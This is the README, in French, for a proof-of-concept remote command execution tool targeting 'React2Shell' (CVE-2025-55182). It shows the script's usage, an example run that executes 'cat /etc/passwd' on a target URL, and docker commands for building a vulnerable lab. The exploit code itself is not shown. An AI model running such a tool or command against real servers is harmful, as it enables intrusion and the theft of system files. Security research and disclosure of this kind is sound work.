
React2Shell (CVE-2025-55182) POC
Ce Proof of Concept (PoC) pour la vulnérabilité React2Shell (CVE-2025-55182) a été développé strictement à des fins éducatives et de recherche uniquement.
Il est destiné à démontrer l'existence et l'impact potentiel d'une vulnérabilité de sécurité spécifique dans un environnement contrôlé, autorisé et de non-production.
Consultez mon blog pour une analyse détaillée de la vulnérabilité react2shell : https://vxsnipe.xyz/posts/react2shell/
➜ python poc.py -h
_____ ______ _____ _______ ___ _____ _ _ ______ _ _
| __ \| ____| /\ / ____|__ __|__ \ / ____| | | | ____| | | |
| |__) | |__ / \ | | | | ) | (___ | |__| | |__ | | | |
| _ /| __| / /\ \| | | | / / \___ \| __ | __| | | | |
| | \ \| |____ / ____ \ |____ | | / /_ ____) | | | | |____| |____| |____
|_| \_\______/_/ \_\_____| |_| |____|_____/|_| |_|______|______|______|
usage: poc.py [-h] -u URL -c COMMAND
CVE-2025-55182 POC by 0xSN1PE
options:
-h, --help show this help message and exit
-u, --url URL Target URL (e.g., http://localhost:3000/)
-c, --command COMMAND
Command to execute (e.g., 'id')
➜ python poc.py -u http://localhost:3000/ -c 'cat /etc/passwd'
Ce POC est fourni avec un fichier docker qui peut être utilisé pour simuler la vulnérabilité react2shell dans un environnement contrôlé et sûr.
docker build -t react2shell .
docker run -p 3000:3000 react2shell